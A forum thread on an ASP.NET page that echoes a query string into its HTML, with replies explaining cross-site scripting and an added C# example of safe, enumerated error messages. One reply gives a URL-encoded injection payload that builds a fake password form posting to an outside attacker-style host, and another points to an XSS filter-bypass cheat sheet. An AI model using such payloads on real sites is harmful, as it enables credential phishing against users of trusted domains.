Opinions on writing QueryString to page

This isn't actually a problem as such, just wondering what people think about this :)

I've just come across a commercial ASP.NET system we're using and it defaulted me to a page where it told me I wasn't authorised to view the page, but it had written this message as a querystring and then presumably Response.Write to page. Sure enough, I changed the querystring and the page displayed exactly what I'd typed, even down to displaying an input box on the page.

Just wondering if you feel it's bad practice to allow a user to manipulate page content like this? I know it's something I've always tried to avoid when doing sites.
 
Yes, very bad practice, and leaves a huge gaping security hole. If, say, the domain name was of a "trusted" site.. I could dupe users to send their details to my site, by getting them to click and complete:
Code:
http://blah/page.htmx?body=%3Cform+action3D%22http%3A%2F2Fimg0nn4h4cky0u5uck4%2Fl33t0r.php%22%3E3Cp%3EEnter+you+secret+squirrell+password%3C%2Fp%3E%3Cinput+type3D%22text%22+name%3D%22lolol%22%3E%3Cbr+%2F%3E3Cinput+type%3D%22submit%22%3E%3C%2Fform%3E
 
Exactly as above.

When I have an error screen I pass an enumerated ID of the error to the page, and then run a select case to get exactly what error message should be displayed.
 
Yeah that's what I thought :)

The worrying thing is the developers must have set validateRequest="false" because by default .NET picks up malicious looking stuff in the querystring.
 
This is part of a whole range of security vulnerabilities called Cross Site Scripting (XSS). With it an attacker can, if they know about the system, do such things as steal admin session cookies and gain access to the system.

There's a good XSS cheat sheet full of various different ways of doing it (some that will bypass rudimentary filters) here: http://ha.ckers.org/xss.html

There are third party libraries that will strip this stuff out (or rather, start from a whitelist and only allow "safe" stuff through) but the best way is to avoid echoing a query string like that.

As for setting validateRequest=false, some developers do that site wide if many pages accept rich text (html) as in a content management system.
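The enumerated-ID approach from the earlier reply, next to the pattern the thread is complaining about, as an added C# example (not code from this thread or from the product the original poster mentions). The enum members, message texts and method names are assumptions; the point is that the query string only ever carries an opaque number, and the one place a user value is echoed goes through an HTML encoder first.

```csharp
using System;
using System.Net;

// Added example: a server-side error catalogue for an error page.
// The request supplies only ?err=N; the text the browser sees is chosen here.
public enum ErrorId
{
    Unknown = 0,        // fallback for anything that is not a known ID
    NotAuthorised = 1,
    SessionExpired = 2,
    RecordNotFound = 3
}

public static class ErrorPage
{
    // The pattern described in the thread: ?body=... is written straight to the page,
    // so any markup in the query string becomes part of the rendered document.
    public static string RenderVulnerable(string body)
    {
        return "<p>" + body + "</p>";
    }

    // Hardened pattern: parse ?err= as an integer, accept it only if it is a
    // defined member of the enum, then map it to a message with a select/switch.
    public static string RenderSafe(string errParam)
    {
        ErrorId id = ErrorId.Unknown;
        int n;
        if (int.TryParse(errParam, out n) && Enum.IsDefined(typeof(ErrorId), n))
            id = (ErrorId)n;

        string message;
        switch (id)
        {
            case ErrorId.NotAuthorised:  message = "You are not authorised to view this page."; break;
            case ErrorId.SessionExpired: message = "Your session has expired. Please sign in again."; break;
            case ErrorId.RecordNotFound: message = "The requested record could not be found."; break;
            default:                     message = "An error occurred. Please try again."; break;
        }
        return "<p>" + message + "</p>";
    }

    // If a user-supplied value really has to appear on the page (e.g. the path the
    // user asked for), encode it so that '<', '>', '"' and '&' are shown as text.
    // Inside ASP.NET, Server.HtmlEncode / HttpUtility.HtmlEncode do the same job.
    public static string RenderSafe(string errParam, string echoedValue)
    {
        return RenderSafe(errParam) + "<p>Requested: " + WebUtility.HtmlEncode(echoedValue) + "</p>";
    }
}
```

With this layout, tampering with `err` can only select a different canned message or the generic fallback; it cannot add an input box to the page.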
 